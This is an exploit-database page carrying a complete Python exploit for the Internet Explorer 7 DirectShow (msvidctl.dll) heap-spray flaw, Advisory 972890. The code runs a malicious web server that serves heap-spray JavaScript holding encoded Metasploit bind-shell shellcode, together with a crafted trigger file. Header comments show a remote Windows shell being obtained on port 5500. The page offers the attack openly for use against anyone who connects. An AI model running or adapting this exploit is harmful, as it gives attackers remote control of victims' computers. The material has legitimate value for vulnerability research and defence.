Lucene search
K

MS Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit

🗓️ 11 Jul 2009 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 13 Views

MS Internet Explorer 7 ActiveX Remote Buffer Overflow Exploit Advisor

Code

                                                #!/usr/bin/env python
######################################################################################
# MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray  (Advisory 972890)     #				 		 				 				    
######################################################################################
#									             #
# Written by SecureState R&D Team 	                                             #
# Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin              #
# http://www.securestate.com				 		             #
#									             #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind        #
#									             #
######################################################################################
# Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7                             # 
######################################################################################
#										     #
# This exploit is publicly being exploited in the wild, opted to release this	     #
# to the research community. Microsoft is aware of the vulnerability.		     #
#										     #
######################################################################################
#										     #
# [-] Exploit sent... [-]							     #
# [-] Wait about 30 seconds and attempt to connect.[-]				     #
# [-] Connect to IP Address: 10.211.55.140 and port 5500 [-]		             #
#										     #
# relik@sslinuxvm1:~$ telnet 10.211.55.140 5500					     #
# Trying 10.211.55.140...							     #
# Connected to 10.211.55.140.							     #
# Escape character is '^]'.							     #
# Microsoft Windows [Version 5.2.3790]						     #
# (C) Copyright 1985-2003 Microsoft Corp.					     #
#									             #
# C:\Documents and Settings\Administrator\Desktop>				     #
#										     #
#										     #
# NOTE: The javascript code is not obfuscated in anyway, normal A/V should pick this #
# up. This is intentional.							     #
#										     #
# Improved reliability, appears to be about 95 percent of the time. Adjusted the     #
# spray size a bit.								     #
#										     #
######################################################################################
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import sys,binascii
try:
  import psyco
  psyco.full()
except ImportError:
   pass
class myRequestHandler(BaseHTTPRequestHandler):
 try:
  def do_GET(self):
    # Always Accept GET
    self.printCustomHTTPResponse(200)
    # trigger the overflow *boom*
    if self.path == "/ohn0es.jpg":
       unhex=binascii.unhexlify("000300001120340000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0c0c0c0c00")
       self.wfile.write(unhex)
    if self.path == "/":
        target=self.client_address[0]
        self.wfile.write("""<html><head>""")
        self.wfile.write("""
        <script language="JavaScript" defer>
        function Check() {
        //  win32_bind -  EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai http://metasploit.com */
        var shellcode = unescape("%ud9db%u74d9%uf424%uc929%u51b1%u02bf%u6c21%u588e%u7831%u8317%u04c0%u7a03%u8e32%u867b%ua55e%u9ec9%uc666%ua12d%ub2f9%u79be%u4fde%ubd7b%u2c95%uc581%u23a8%u7a02%u30b3%ua44a%uadc2%u2f3c%ubaf0%uc1be%u7cc8%ub159%ubdaf%uce2e%uf76e%ud1c2%ue3b2%uea29%ud066%u79f9%u9362%ua5a5%u4f6d%u2e3f%uc461%u6f4b%udb66%u8ca0%u50ba%ufebf%u7ae6%u3da1%u59d7%u4a45%u6e5b%u0c0d%u0550%u9061%u92c5%ua0c2%ucd4b%ufe4c%ue17d%u0101%u9f57%u9bf2%u5330%u0bc7%ue0b6%u9415%uf86c%u428a%ueb46%ua9d7%u0b08%u92f1%u1621%uad98%ud1df%uf867%ue075%ud298%u3de2%u276f%uea5f%u118f%u46f3%uce23%u2ba7%ub390%u5314%u55c6%ubef3%uff9b%u4850%u6a82%uee3e%ue45f%ub978%ud2a0%u56ed%u8f0e%u860e%u8bd8%u095c%u84f0%u8061%u7f51%ufd61%u9a3e%u78d4%u33f7%u5218%uef58%u0eb2%udfa6%ud9a8%ua6bf%u6008%ua717%uc643%u8768%u830a%u41f2%u30bb%u0496%uddde%u4f38%uee08%u8830%uaa20%ub4cb%uf284%u923f%ub019%u1c92%u19a7%u6d7e%u5a52%uc62b%uf208%ue659%u15fc%u6361%ue547%ud04b%u4b10%ub725%u01cf%u66c4%u80a1%u7797%u4391%u5eb5%u5a17%u9f96%u08ce%ua0e6%u33d8%ud5c8%u3070%u2d6a%u371a%uffbb%u171c%u0f2c%u9c68%ubcf2%u4b92%u92f3");
        var bigblock = unescape("%u9090%u9090");
	var headersize = 20;
	var slackspace = headersize + shellcode.length;
	while (bigblock.length < slackspace) bigblock += bigblock;
	var fillblock = bigblock.substring(0,slackspace);
	var block = bigblock.substring(0,bigblock.length - slackspace);
        // Original spray size below, use if you want exploit to load faster with higher crash rate.
        // while (block.length + slackspace < 0x40000) block = block + block + fillblock;
	while (block.length + slackspace < 0x70000) block = block + block + fillblock;
	var memory = new Array();
	for (i = 0; i < 350; i++){ memory[i] = block + shellcode}
	var myObject=document.createElement('object');
	DivID.appendChild(myObject);
	myObject.width='1';
	myObject.height='1';
	myObject.data='./ohn0es.jpg';
	// Vulnerable ID
	myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';		
	} 
        </script>
        </head>
        <body onload="Check();">
        <div id="DivID">""")
        self.wfile.write("""<title>MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890)</title></head><body>""")
        self.wfile.write("""<left><body bgcolor="Black"><font color="White">
                ###############################################################################
		<br>MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray  (Advisory 972890)     
		<br>Written by SecureState R&D Team                                                    
		<br>Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin              
		<br>http://www.securestate.com                                                         
		<br>win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind        
		<br>Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7                            
                <br>###############################################################################<br> 
        	<br>""")
        print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-] Connect to IP Address: %s and port 5500 [-]" % (target))
  # Print custom HTTP Response
  def printCustomHTTPResponse(self, respcode):
    self.send_response(respcode)
    self.send_header("Content-type", "text/html")
    self.send_header("Server", "myRequestHandler")
    self.end_headers()

 # In case of exceptions, pass them
 except Exception:
    pass

httpd = HTTPServer(('', 80), myRequestHandler)
print ("""
#####################################################################################
# MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray  (Advisory 972890)    #
#####################################################################################
#                                                                                   #
# Written by SecureState R&D Team                                                   #
# Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin             #
# http://www.securestate.com                                                        #
#                                                                                   #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind       #
#                                                                                   #
#####################################################################################
#        Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7                     #
#####################################################################################
""")
print ("[-] Starting MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray [-]")
print ("[-] Have someone connect to you on port 80 [-]")
print ("\n\nType <control>-c to exit..")
try:
     # handle the connections
     httpd.handle_request()
     # Serve HTTP server forever
     httpd.serve_forever() 
# Except Keyboard Interrupts and throw custom message
except KeyboardInterrupt:
       print ("\n\nExiting exploit...\n\n")
       sys.exit(1)
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Jul 2009 00:00Current
7.1High risk
Vulners AI Score7.1
13